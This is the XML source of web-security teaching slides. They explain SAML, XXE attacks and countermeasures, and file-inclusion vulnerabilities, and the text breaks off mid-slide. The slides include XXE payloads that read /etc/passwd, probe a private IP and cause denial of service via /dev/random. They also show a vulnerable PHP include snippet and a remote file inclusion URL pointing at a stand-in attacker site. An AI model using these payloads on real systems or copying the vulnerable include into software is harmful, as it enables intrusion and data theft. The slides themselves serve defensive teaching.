              <a:t> uses XML for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identity assertions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and may be vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the application uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prior to version 1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160429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5EF1D8-E636-4C47-A589-289EF76F8A33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>How SAML works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A85B1C-2301-4F26-BBB2-D8F0862EBF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SAML SSO works by transferring the user’s identity from one place (the identity provider) to another (the service provider). This is done through an exchange of digitally signed XML documents. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user accesses the remote application using a link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application identifies the user’s origin (by application subdomain, user IP address, or similar) and redirects the user back to the identity provider, asking for authentication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user either has an existing active browser session with the identity provider or establishes one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The identity provider builds the authentication response in the form of an XML-document containing the user’s username or email address, signs it using an X.509 certificate, and posts this information to the service provider.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service provider, which already knows the identity provider and has a certificate fingerprint, retrieves the authentication response and validates it using the certificate fingerprint.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The identity of the user is established and the user is provided with app access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271322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E88192-23AE-4DB5-BED5-EEE9380D277E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>External</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Entities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>examples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C21AF89B-1BD7-4BD0-8C35-EDAD90BA7589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Scenario #1: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>extract</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> data from the server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&lt;?xml </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>="1.0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>="ISO-8859-1"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>    &lt;!DOCTYPE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>    &lt;!ELEMENT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> ANY &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>    &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> SYSTEM "file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Scenario #2: An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>probes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>server's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> private network by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>changing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> ENTITY line to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>    &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> SYSTEM "https://192.168.1.1/private" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Scenario #3: An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attempts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>-of-service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>potentially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>endless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>    &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> SYSTEM "file:///dev/random" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349694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214584-B56D-4258-9249-CA470C706C7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Countermeasures</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{842871C0-77F5-40BB-9167-E847043DCD1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever possible, use less complex data formats such as JSON, and avoiding serialization of sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patch or upgrade all XML processors and libraries in use by the application or on the underlying operating system. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable XML external entity and DTD processing in all XML parsers in the application, as per the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>OWASP Cheat Sheet 'XXE Prevention'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement positive ("whitelisting") server-side input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tools can help detect XXE in source code, although manual code review is the best alternative in large, complex applications with many integrations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If these controls are not possible, consider using virtual patching, API security gateways, or Web Application Firewalls (WAFs) to detect, monitor, and block XXE attacks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4010985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Remote File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Inclusion</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto testo 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3554325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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto contenuto 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Inclusion vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>allows an attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include a file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, usually exploiting a "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>dynamic file inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>" mechanisms implemented in the target application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Code execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Code execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> such as JavaScript which can lead to other attacks such as cross site scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Denial of Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Sensitive Information Disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1436511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Essentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>we should look for scripts which take filenames as parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>incfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> = $_REQUEST["file"]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>include($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>incfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>.".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Remediation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to avoid passing user-submitted input to any filesystem/framework API. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>maintain a white list of files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>use an identifier (for example the index number) to access to the selected file. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76060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Starting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> xml</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt; 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>      &lt;users&gt;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
